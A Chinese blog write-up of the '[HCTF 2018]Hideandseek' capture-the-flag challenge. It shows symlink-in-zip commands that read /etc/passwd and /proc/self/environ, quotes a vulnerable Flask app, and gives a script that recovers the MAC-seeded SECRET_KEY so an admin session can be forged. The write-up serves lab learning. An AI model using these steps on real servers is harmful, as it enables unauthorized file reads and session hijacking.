BUUCTF--[HCTF 2018]Hideandseek

最新推荐文章于 2023-10-20 19:02:12 发布
最新推荐文章于 2023-10-20 19:02:12 发布
阅读量376 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/119829903
版权

 帐号登录后是一个上传ZIP文件

上传一个.ZIP文件后发现他会显示文件的内容

 可能是有文件读取,我们创建一个软链接(类似windows的快捷方式)指向一个服务器上的文件,尝试是否可以读取

aliang@aliang:~/Desktop# ln -s /etc/passwd passwd
aliang@aliang:~/Desktop# zip -y passwd.zip passwd 
  adding: passwd (stored 0%)

 上传后发现可以成功读取到/etc/passwd的内容

 尝试使用admin登录,给出提示

因为这里并没有注册的步骤,所以猜测这里使用的是cookie或session来进行检测是否为admin
查看一下页面cookie信息,发现一个很想flask的session,使用jwt解密

这样方向就非常明显了,我们只需要找到加密所需的密钥,来伪造session即可
接着来尝试读取文件

/proc是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,
用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息,甚至可以通过更改其中某些文件来改变内核的运行状态。

environ是 — 当前进程的环境变量列表,self可以替换成进程号。

读取/proc/self/environ

生成一个指向/proc/self/environ的软链接
ln -s /proc/self/environ env

压缩这个软链接生成zip压缩文件
zip -y env.zip env

上传文件读取到

HOSTNAME=98cce75cd9cb
SHLVL=1
PYTHON_PIP_VERSION=19.1.1
HOME=/root
GPG_KEY=0D96DF4D4110E5C43FBFB17F2D347EA6AA65421D
UWSGI_INI=/app/uwsgi.ini
WERKZEUG_SERVER_FD=3
NGINX_MAX_UPLOAD=0UWSGI_PROCESSES=16
STATIC_URL=/static_=/usr/local/bin/python
UWSGI_CHEAPER=2
WERKZEUG_RUN_MAIN=true
NGINX_VERSION=1.15.8-1~
stretchPATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
NJS_VERSION=1.15.8.0.2.7-1~
stretchLANG=C.UTF-8
PYTHON_VERSION=3.6.8
NGINX_WORKER_PROCESSES=1
LISTEN_PORT=80
STATIC_INDEX=0
PWD=/app
PYTHONPATH=/app
STATIC_PATH=/app/static
LAG=not_flag

uWSGI是一个Web应用服务器,它具有应用服务器,代理,进程管理及应用监控等功能。它支持WSGI协议,同时它也支持自有的uWSGI协议

接着读取文件/app/uwsgi.ini(还是上述方法,就不再赘述)

[uwsgi] 
module = main 
callable=app 
logto = /tmp/hard_t0_guess_n9p2i5a6d1s_uwsgi.log

这里按道理来说应该是访问/app/main.py可以读取源码,这里可能是buu配置原因没有读出,借用源码

# -*- coding: utf-8 -*-
from flask import Flask,session,render_template,redirect, url_for, escape, request,Response
import uuid
import base64
import random
import flag
from werkzeug.utils import secure_filename
import os
random.seed(uuid.getnode())
app = Flask(__name__)
app.config['SECRET_KEY'] = str(random.random()*100)
app.config['UPLOAD_FOLDER'] = './uploads'
app.config['MAX_CONTENT_LENGTH'] = 100 * 1024
ALLOWED_EXTENSIONS = set(['zip'])

def allowed_file(filename):
    return '.' in filename and \
           filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS


@app.route('/', methods=['GET'])
def index():
    error = request.args.get('error', '')
    if(error == '1'):
        session.pop('username', None)
        return render_template('index.html', forbidden=1)

    if 'username' in session:
        return render_template('index.html', user=session['username'], flag=flag.flag)
    else:
        return render_template('index.html')


@app.route('/login', methods=['POST'])
def login():
    username=request.form['username']
    password=request.form['password']
    if request.method == 'POST' and username != '' and password != '':
        if(username == 'admin'):
            return redirect(url_for('index',error=1))
        session['username'] = username
    return redirect(url_for('index'))


@app.route('/logout', methods=['GET'])
def logout():
    session.pop('username', None)
    return redirect(url_for('index'))

@app.route('/upload', methods=['POST'])
def upload_file():
    if 'the_file' not in request.files:
        return redirect(url_for('index'))
    file = request.files['the_file']
    if file.filename == '':
        return redirect(url_for('index'))
    if file and allowed_file(file.filename):
        filename = secure_filename(file.filename)
        file_save_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
        if(os.path.exists(file_save_path)):
            return 'This file already exists'
        file.save(file_save_path)
    else:
        return 'This file is not a zipfile'


    try:
        extract_path = file_save_path + '_'
        os.system('unzip -n ' + file_save_path + ' -d '+ extract_path)
        read_obj = os.popen('cat ' + extract_path + '/*')
        file = read_obj.read()
        read_obj.close()
        os.system('rm -rf ' + extract_path)
    except Exception as e:
        file = None

    os.remove(file_save_path)
    if(file != None):
        if(file.find(base64.b64decode('aGN0Zg==').decode('utf-8')) != -1):
            return redirect(url_for('index', error=1))
    return Response(file)


if __name__ == '__main__':
    #app.run(debug=True)
    app.run(host='0.0.0.0', debug=True, port=10008)

代码第29行,可以知道flag是藏在/app/flag.py文件里,想着是不是可以生成下软链接直接读取呢,后面测试,发现还是提示you are not admin
然后重定向到index页面,原来是第79行处,执行了一个判断,如果通过上传的zip打开的文件里面有含有hctf的话,就会重定向到index?error=1页面,所以这条路是行不通的,对应了前面分析。
所以只能通过找SECRET_KEY这个方法了,我们看到第11行 app.config['SECRET_KEY'] = str(random.random()*100)SECRET_KEY居然等于一个随机数字字符串
难道每次SECRET_KEY能不一样,后面发现,原来在这行代码之前第9行处,有一个random.seed(uuid.getnode()),设置随机数种子操作。我们知道,python random生成的数不是真正的随机数,而是伪随机数,利用伪随机数的特性,只要种子是一样的,后面产生的随机数值也是一致的
于是把注意力放到这里的伪随机数种子,uuid.getnode(),通过查询可以知道,这个函数可以获取网卡mac地址并转换成十进制数返回。也就是说,只要搞到服务器的网卡mac地址,就能确定种子,进而确定SECRET_KEY,那服务器网卡mac地址又怎么获得呢?
linux中一切皆文件,网卡mac地址也能在文件中找到。可以通过读/sys/class/net/eth0/address文件得到mac地址,于是构造软链接、生成zip、上传看返回结果,如下图,得到服务器mac地址为:02:42:ac:10:b4:41。然后就是把mac地址处理下,转换成10进制,然后设置成seed,生成一下SECRET_KEY。脚本如下

import uuid
import random

mac = "02:42:ac:10:b4:41"
temp = mac.split(':')
temp = [int(i,16) for i in temp]
temp = [bin(i).replace('0b','').zfill(8) for i in temp]
temp = ''.join(temp)
mac = int(temp,2)
random.seed(mac)
randStr = str(random.random()*100)
print(randStr) #结果为 20.406955917442282

 使用flask-session-cookie-manager脚本进行加密

修改完session后再次刷新即可登录到admin用户得到flag

Uzero.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF[HCTF 2018]WarmUp
weixin_53955759的博客
09-02 286
打开题目发现一张滑稽的图片???? 查看源码以后发现源码中有一个访问地址source.php 访问以后得到了源码 发现了文件包含的特点 highlight_file(__FILE__) <?php highlight_file(__FILE__); classemmm { publicstaticfunctioncheckFile(&$page) { $whitelist=["source"=&...
ollie-hideAndSeek:基于swoole的联机小游戏
03-31
捉迷藏 根据进行相关学习逐步功能进行扩展优化 一个使用了Swoole作为服务端,Vue作为前端展示的捉迷藏小游戏 效果图 运行方法 在app文件夹下运行php Server.php即可 使用工具 PHPStorm 壳 Chrome合金 ...少量算法逻辑
BUUCTF [HCTF 2018] Hide and seek
Senimo
01-12 1057
BUUCTF [HCTF 2018] Hide and seek 考点: 软连接读取任意文件 Flask伪造session /proc/self/environ文件获取当前进程的环境变量列表 random.seed()生成的伪随机数种子 MAC地址存放在/sys/class/net/eth0/address文件 启动环境: 信息中心,登陆后查看更多信息,导航栏上内容并不会跳转 尝试登陆: 以为是弱密码,但发现任意用户密码均可登陆,登陆后存在上传点 首先上传正常的txt文件: 得到回显: 需要上传
[HCTF 2018]Hideandseek
Youth____的博客
01-30 314
首先打开题目环境 是一个登录页面,上面提示想要获得更多的信息,先登录,试了下admin,随便输入了几个密码,不行。 那就随便输入个账号密码登录看看 提示了,在我上传一个要做文件后他会告诉我一个秘密 随便上传一个压缩包试试 直接就返回了我在压缩包被存放的文件的内容 可能是zip软连接实现任意文件读取,测试一下,读取/etc/passwd 上传passwd.zip 成功读取了,试试看能不能读取flag(虽然我觉得几率不大) 果然啥也没有,f12,在cookie上面看到了session 有可能是fl
BUUCTF-[HCTF 2018]WarmUp1
Monica的博客
09-03 2407
目录 题目: 知识点: 分析: 遇到的问题: 一、服务端会对传入的参数自动进行一次urldecode,并且对于不能url解码的字符串再次进行url解码,字符串不会变化 二、include相对路径问题 题目: 打开环境发现只有一个滑稽,日常查看源代码,发现有个source.php 访问url/source.php 得到源码 <?php highlight_file(__FILE__); class emmm { public sta...
Python库 | hideandseek-0.1.1.8.tar.gz
05-16
资源分类:Python库 所属语言:Python 资源全名:hideandseek-0.1.1.8.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
HideAndSeek:为PocketMine-MP重新创建的捉迷藏游戏
05-01
/ hideandseek <子命令> [参数] 子命令: creategame(或addgame):创建一个捉迷藏的游戏 deletegame(或delgame):删除捉迷藏 setmaxplayers(或smp):设置最大玩家数 setseekerspercentage(或ssp):...
Hide and Seek-crx插件
04-02
语言:English 将记住完成文件的功能添加到github pr。 此工具可帮助简化请求请求。 它可以让您“完成”文件,从而有所帮助。 *这将自动隐藏文件*当您重新访问该页面时,它将使您已完成的文件保持隐藏状态*但是,如果...
HideAndSeekHideAndSeek游戏
02-15
HideAndSeek》是一款基于虚幻引擎4(Unreal Engine 4)开发的捉迷藏游戏。在这款游戏中,玩家可以扮演寻找者或隐藏者,体验到刺激有趣的多人互动玩法。接下来,我们将深入探讨这款游戏背后涉及到的IT知识,尤其是...
BUUCTF [HCTF 2018]WarmUp
weixin_45253622的博客
05-03 200
访问链接 F12查看源码 试着在url后面加入source.php 访问hint.php 侥幸的试了一下。 无结果,可以看出是代码审计问题。试着分析一下源码。 <?php highlight_file(__FILE__); //使用highlight_file函数,想到可能是与文件相关的漏洞 class emmm { public static function checkFile(&$page) //这里传入参数.
BUUCTF:[HCTF 2018]Hide and seek
末初的CSDN博客
03-30 2132
BUUCTF:[HCTF 2018]Hide and seek 参考:https://www.jianshu.com/p/d20168da7284 先随便输入账号密码登录 提示我们上传zip文件 上传一个文件压缩后的zip,输出了文件压缩前的内容 可能是有文件读取,我们创建一个软链接(类似windows的快捷方式)指向一个服务器上的文件,试试看能不能读取 root@mochu7:~/Desk...
[HCTF 2018] Hide and seek(buuctf),Unzip(ctfshow)
最新发布
wwwwyyyrre的博客
10-20 288
考核完对python软连接还是不熟悉,把这两道题在做一下。
BUU [HCTF 2018]Hideandseek
Jay17的博客
09-16 619
BUU [HCTF 2018]Hideandseek
记[HCTF 2018]Hideandseek
crispr的博客
07-14 1115
记[HCTF 2018]Hideandseek 前言 一万年没刷题了,尽搞些杂七杂八的了,于是乎刷了一个题(自己给自己一个嘴巴子) 总结一下这个题的考点: zip 软链接实现任意文件读取 linux系统目录的熟悉 flask session伪造和加解密 正言 直接上题: 意图很明显,直接让你传zip文件,因此在这里想到可能是想让你进行zip软链接来读取其他文件,大晚上了,这里直接上写的exp吧: #coding=utf-8 import os import requests import sys u
hctf2018-admin
Sea_Sand息禅
09-26 960
1、问题分析 熟悉一下网站,有这些功能:注册、登录、上传文章、修改密码、登出 对源码进行观察,发现 源码中存在 <!-- you are not admin --> 可能我们要以管理员身份登录吧。 继续找线索,最后发现在修改密码的源码中有: https://github.com/woadsl1234/hctf_flask/ 这个是网站用的flask源码,然后clone下来就可以进行代...
【Hackme CTF】Web--hide and seek
VZZmieshenquan的博客
04-21 615
Description: Can you see me? I’m so close to you but you can’t see me. Solution: 点开网址 https://hackme.inndy.tw/ 查看页面源代码,拉到最底端看到flag Flag: FLAG{0h U C meeeeeeeeeeeeeeeeeeee!} ...
[bzoj1941][SDOI2010]Hide and Seek
Vampire
04-23 632
1941: [Sdoi2010]Hide and SeekTime Limit: 16 Sec Memory Limit: 162 MB Submit: 755 Solved: 425 [Submit][Status][Discuss] Description小猪iPig在PKU刚上完了无聊的猪性代数课,天资聪慧的iPig被这门对他来说无比简单的课弄得非常寂寞,为了消除寂寞感,他决定和他的
【文件上传】软链接+zip包上传
serendipity1130的博客
08-28 1401
漏洞:任意文件上传读取本地文件,包含链接的zip文件 1.在robots.txt中发现了禁止访问的地址,进行地址访问: 2. 来到登录界面,使用burp爆破出密码为:admin admin 3. 查看到需要上传文件,并且有提示: 4.生成软链接,打包上传即可获取flag ...
使用unity依赖,C#编写躲猫猫代码
05-25
public class HideAndSeek : MonoBehaviour { public GameObject cat; public Transform[] hidingSpots; private int currentHidingSpotIndex; private bool isGameRunning; private void Start() { ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值